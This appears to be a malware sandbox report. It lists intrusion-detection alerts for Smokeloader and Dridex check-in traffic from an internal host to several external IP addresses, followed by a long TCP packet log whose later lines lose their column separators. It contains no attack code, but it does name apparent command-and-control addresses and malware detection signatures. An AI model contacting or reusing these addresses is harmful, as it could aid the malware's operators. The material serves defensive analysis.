2024-09-25T16:01:59.729148+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49733 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:01.002562+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49735 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:02.511353+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49736 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:04.095673+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49737 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:06.505504+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49738 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:07.770118+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49739 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:09.265193+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49740 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:20.156005+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49741 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:20.563474+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49741 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:20.659998+0200 | 2829848 | ETPRO MALWARE SmokeLoader encrypted module (3) | 2 | 23.145.40.162 | 443 | 192.168.2.5 | 49741 | TCP
2024-09-25T16:02:21.806634+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49742 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:22.175887+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49742 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:22.789674+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49743 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:23.074361+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49743 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:23.667347+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49744 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:23.949540+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49744 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:24.558695+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49745 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:24.991989+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49745 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:25.615628+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49746 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:25.892849+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49746 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:26.570388+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49747 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:26.856911+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49747 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:27.541564+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49748 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:27.820364+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49748 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:28.599198+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49749 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:28.922723+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49749 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:29.775443+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49750 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:30.052893+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49750 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:36.401964+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49751 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:36.940781+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49751 | 23.145.40.162 | 443 | TCP
2024-09-25T16:03:21.252704+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49752 | 116.58.10.60 | 80 | TCP
2024-09-25T16:03:31.755722+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49753 | 116.58.10.60 | 80 | TCP
2024-09-25T16:03:45.252831+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49754 | 116.58.10.60 | 80 | TCP
2024-09-25T16:03:53.184311+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49755 | 23.145.40.162 | 443 | TCP
2024-09-25T16:03:53.528263+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49755 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:04.585527+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49756 | 190.98.23.157 | 80 | TCP
2024-09-25T16:04:13.856339+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49757 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:14.335519+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49757 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:26.957735+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49758 | 190.98.23.157 | 80 | TCP
2024-09-25T16:04:36.813735+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49759 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:37.139984+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49759 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:50.039241+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49760 | 190.98.23.157 | 80 | TCP
2024-09-25T16:04:59.137001+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.5 | 49761 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:59.516202+0200 | 2809882 | ETPRO MALWARE Dridex Post Checkin Activity 3 | 1 | 192.168.2.5 | 49761 | 23.145.40.162 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 16:01:29.708235979 CEST | 49711 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:29.713125944 CEST | 80 | 49711 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:29.713243961 CEST | 49711 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:29.713839054 CEST | 49711 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:29.713872910 CEST | 49711 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:29.720551014 CEST | 80 | 49711 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:29.720719099 CEST | 80 | 49711 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:30.964297056 CEST | 80 | 49711 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:30.964448929 CEST | 80 | 49711 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:30.964560032 CEST | 49711 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:30.965774059 CEST | 49711 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:30.969006062 CEST | 49712 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:30.970510960 CEST | 80 | 49711 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:30.973794937 CEST | 80 | 49712 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:30.973973036 CEST | 49712 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:30.973973989 CEST | 49712 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:30.973973989 CEST | 49712 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:30.978746891 CEST | 80 | 49712 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:30.978801012 CEST | 80 | 49712 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:32.199060917 CEST | 80 | 49712 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:32.199235916 CEST | 80 | 49712 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:32.199413061 CEST | 49712 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:32.199691057 CEST | 49712 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:32.204543114 CEST | 80 | 49712 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:32.209014893 CEST | 49713 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:32.213887930 CEST | 80 | 49713 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:32.214025021 CEST | 49713 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:32.214114904 CEST | 49713 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:32.214138985 CEST | 49713 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:32.219048023 CEST | 80 | 49713 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:32.219098091 CEST | 80 | 49713 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:33.463205099 CEST | 80 | 49713 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:33.468080044 CEST | 80 | 49713 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:33.468152046 CEST | 49713 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:33.468240023 CEST | 49713 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:33.471951962 CEST | 49714 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:33.473548889 CEST | 80 | 49713 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:33.476891994 CEST | 80 | 49714 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:33.476962090 CEST | 49714 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:33.477191925 CEST | 49714 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:33.477210045 CEST | 49714 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:33.482079983 CEST | 80 | 49714 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:33.482172966 CEST | 80 | 49714 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:34.746088982 CEST | 80 | 49714 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:34.746104002 CEST | 80 | 49714 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:34.746161938 CEST | 49714 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:34.746299982 CEST | 49714 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:34.749664068 CEST | 49715 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:34.751247883 CEST | 80 | 49714 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:34.754587889 CEST | 80 | 49715 | 116.58.10.60 | 192.168.2.5
Sep 25, 2024 16:01:34.754698992 CEST | 49715 | 80 | 192.168.2.5 | 116.58.10.60
Sep 25, 2024 16:01:34.754909039 CEST | 49715 | 80 | 192.168.2.5 | 116.58.10.60
                                                                      Sep 25, 2024 16:01:34.754909039 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:34.759975910 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:34.760178089 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.015013933 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.015208960 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.015286922 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.015357018 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.018661976 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.020117998 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.023533106 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.023660898 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.023788929 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.023788929 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.028553963 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.028866053 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.606019020 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.606595039 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.606648922 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.606688976 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.611565113 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.615006924 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.619882107 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.619982958 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.620239973 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.620268106 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.625103951 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.625114918 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.026094913 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.026115894 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.026226997 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.026370049 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.029406071 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.031152964 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.034190893 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.034276009 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.034404993 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.034416914 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.039153099 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.039333105 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.325072050 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.325346947 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.325429916 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.325489044 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.328349113 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.330543041 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.333430052 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.333511114 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.333619118 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.333642960 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.338443995 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.338465929 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.599371910 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.599498987 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.599554062 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.599639893 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.603055000 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.606756926 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.607847929 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.607949018 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.608059883 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.608084917 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.613718987 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.614846945 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.873982906 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.875327110 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.875380993 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.875427008 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.880222082 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.883331060 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.888243914 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.888326883 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.888470888 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.888525009 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.893472910 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.893485069 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.128271103 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.128911972 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.128985882 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.129065990 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.131469965 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.134546041 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.136485100 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.136558056 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.136698008 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.136732101 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.142019033 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.142137051 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.386388063 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.386478901 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.386548996 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.389522076 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.394318104 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.514379978 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.519304991 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.519372940 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.519504070 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.519610882 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.524274111 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.524379969 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.758783102 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.759051085 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.759129047 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.759294987 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.762048006 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.764055014 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.766901970 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.769692898 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.769692898 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.769721985 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.774609089 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.774667978 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.049710035 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.049730062 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.049798012 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.050018072 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.054842949 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.055771112 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.060625076 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.060698986 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.060842991 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.060877085 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.067914963 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.067926884 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.324126959 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.324282885 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.324357986 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.324455023 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.329265118 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.333760977 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.338932991 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.339008093 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.339158058 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.339195013 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.345532894 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.345547915 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.595983982 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.596034050 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.596093893 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.596235037 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.598862886 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.601037025 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.603672028 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.603748083 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.603841066 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.603859901 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.608582973 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.608712912 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.860969067 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.861020088 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.861068964 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.862776041 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.867598057 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.868125916 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.873006105 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.873095989 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.873326063 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.873358011 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.878233910 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.878246069 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.130346060 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.130372047 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.130511999 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.130781889 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.133506060 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.135512114 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.138412952 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.138514996 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.138679028 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.138693094 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.143471956 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.143522978 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.403583050 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.403647900 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.403704882 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.405524969 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.410391092 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.415508986 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.420423985 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.420528889 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.420666933 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.420680046 CEST4973080192.168.2.5116.58.10.60
